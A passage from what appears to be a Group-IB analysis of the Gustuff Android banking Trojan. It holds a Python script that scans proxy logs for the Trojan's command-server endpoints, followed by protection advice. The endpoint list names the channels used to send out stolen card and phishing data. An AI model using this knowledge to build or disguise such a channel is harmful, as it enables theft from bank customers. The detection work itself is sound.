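    "aevents.php": "preferences update",
    "set_card.php": "data from the Google Play phishing card",
    "logs.php": "log upload",
    "records.php": "data from phishing windows",
    "set_error.php": "error report",
}
API_PREFIX = "/api/v1/"


def classify_url(url: str):
    """Return the endpoint name if the URL path is /api/v1/<known endpoint>, else None."""
    path = urlsplit(url).path
    if not path.startswith(API_PREFIX):
        return None
    endpoint = path[len(API_PREFIX):]
    return endpoint if endpoint in GUSTUFF_ENDPOINTS else None


def parse_line(line: str):
    """Constructed proxy-log format: '<timestamp> <client_ip> <method> <url>'."""
    parts = line.split()
    if len(parts) < 4:
        return None
    return {"ts": parts[0], "client": parts[1], "method": parts[2], "url": parts[3]}


def scan_proxy_log(lines):
    """Per client, the set of (server host, endpoint) pairs matching the Gustuff API."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        endpoint = classify_url(rec["url"])
        if endpoint:
            hits[rec["client"]].add((urlsplit(rec["url"]).netloc, endpoint))
    return dict(hits)


def suspicious_clients(hits, min_distinct=2):
    """Flag (client, host) pairs with at least `min_distinct` distinct endpoints:
    the bot polls get.php and reports every command via set_state.php, so a real
    infection quickly produces more than one endpoint on the same server."""
    flagged = {}
    for client, pairs in hits.items():
        per_host = defaultdict(set)
        for host, endpoint in pairs:
            per_host[host].add(endpoint)
        for host, endpoints in per_host.items():
            if len(endpoints) >= min_distinct:
                flagged[(client, host)] = sorted(endpoints)
    return flagged


# Constructed sample log (addresses and times are made up; 203.0.113.0/24 is TEST-NET-3)
SAMPLE_LOG = [
    "2019-03-28T10:00:01 10.0.0.5 POST http://203.0.113.10/api/v1/get.php",
    "2019-03-28T10:00:02 10.0.0.5 POST http://203.0.113.10/api/v1/set_state.php",
    "2019-03-28T10:00:09 10.0.0.5 POST http://203.0.113.10/api/v1/load_sms.php",
    "2019-03-28T10:01:00 10.0.0.9 GET http://api.example.net/api/v1/get.php",
    "2019-03-28T10:02:00 10.0.0.7 GET http://www.example.org/index.html",
]

if __name__ == "__main__":
    for (client, host), endpoints in suspicious_clients(scan_proxy_log(SAMPLE_LOG)).items():
        print(client, "->", host, [GUSTUFF_ENDPOINTS[e] for e in endpoints])
```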

Recommendations

To protect their customers from the threat of mobile Trojans, companies should use comprehensive solutions that make it possible to monitor and prevent malicious activity without installing additional software on the user's device.

For this, signature-based methods of detecting mobile Trojans need to be strengthened with technologies that analyse the behaviour of both the customer and the application itself. Protection should also include device identification using digital fingerprinting technology, which makes it possible to recognise when an account is being used from an atypical device that has already fallen into a fraudster's hands.

A fundamentally important point is cross-channel analysis, which lets companies control the risks coming not only from the web but also from the mobile channel, for example mobile banking applications, cryptocurrency transactions and any other transactions that can be performed.

Security rules for users:

  • do not install applications on Android mobile devices from sources other than Google Play, and pay special attention to the permissions the application requests;
  • regularly install Android OS updates;
  • pay attention to the extensions of downloaded files;
  • do not visit suspicious resources;
  • do not click links received in SMS messages.

Author: Semyon Rogachev, junior malware research specialist at the Group-IB Computer Forensics Laboratory.

Source: www.habr.com
